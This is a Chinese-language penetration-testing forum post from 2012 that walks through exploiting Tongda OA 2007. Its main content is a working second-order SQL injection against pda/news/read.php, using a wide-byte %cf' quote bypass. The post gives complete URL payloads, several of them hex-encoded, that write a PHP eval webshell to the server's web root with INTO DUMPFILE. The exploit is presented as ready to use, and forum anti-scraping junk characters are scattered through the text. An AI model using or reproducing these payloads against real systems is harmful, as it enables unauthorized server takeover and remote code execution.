中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]

作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本1 o. a% W# k& @; }
7 ]% B- K4 W8 I% ]5 a6 a5 ^
  a! ~7 M. p0 o* W1 E8 Q5 D
Office Anywhere 2007 网络智能办公系统, C5 T7 y! L+ y) o, M7 k, _  p6 p
5 P! k2 I' J/ Y2 H2 H
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
, ~3 R. C1 V4 \" d
0 r: J: q/ v) K9 u" m' _. n# v ( ~* h8 L, [) K+ L+ x  `. b2 G
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的& _4 W) N2 |4 X5 k0 N
* z. y1 A4 e% @8 Q4 G4 K
例如:SELECT * from USER where USER_ID='{$USERNAME}'  $ {9 p1 c8 i5 Y8 V
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了% w" a& l7 }; \- c

- p& k8 J# {4 m( d8 c这个时候我们是不是可以组合起来使用哪?  o! t) _' e6 G" v1 ^3 P

9 Z+ p! b$ _9 {& L0 J第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样8 }% c' r6 e5 b- c
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,106 x$ d& |7 C# b! I& s3 D

% U* M2 [; a/ F1 \这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
" ^1 A0 W$ x# I( `9 z( E 2 L) @5 i, t" Q, t
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
& b) Q5 c' r5 W! O" `" y
% y* j9 t" A8 X那么我们用字符串格式带入进行hex编码, F+ p/ l  h/ G9 s

; C+ O3 [1 V! `4 v; z+ \%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
; L8 T0 L. G9 G& W% b* l / r7 o, M+ ~! [- r, H1 t
测试ok,获取oa的webshell
4 U8 @" g; n( u1 M, i5 O ( |& x% E- ?: y( u( V

4 Z+ h2 c# R, `- h" [  B+ |" S- tpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23% u4 d! `. Q4 [/ `) B+ f" `
直接getwebshell




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2